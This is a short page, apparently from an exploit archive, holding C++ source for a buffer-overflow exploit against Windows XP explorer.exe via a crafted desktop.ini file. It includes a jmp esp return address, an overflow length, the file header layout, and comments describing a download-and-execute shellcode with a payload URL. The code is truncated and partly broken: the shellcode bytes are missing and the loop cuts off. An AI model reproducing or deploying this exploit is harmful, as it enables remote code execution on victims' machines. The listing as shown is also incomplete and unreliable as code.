Windows XP explorer.exe desktop.ini buffer overflow exploit

     * Version TXT Disponible ici *

                              char shellcode[]=
                              //download url and exec shellcode
                              //doesn't have any hardcoded values
                              //except the base address of the program
                              //searches the import table for 
                              //LoadLibraryA, GetProcAddress and ExitProcess.
                              //by .einstein., dH team.

                              char unicode_header[] = "\xFF\xFE";
                              char shell_header[] = "[.ShellClassInfo]\x0d\x0a";

                              #define OVERFLOW_LEN 0xA1C

                              void main()
                              char url[]="file://c:/winnt/system32/calc.exe";
                              // char url[]="http://localhost/cmd.exe";
                              char eip[] = "\xcc\x59\xfb\x77"; //0x77fb59cc - WinXP SP1 ntdll.dll (jmp esp)

                              char path[500]; 
                              strcpy(path,"domain HELL team");

                              ofstream out(path,ios::out+ios::binary);
                              char zero = 0;
                              for (int i=0;i



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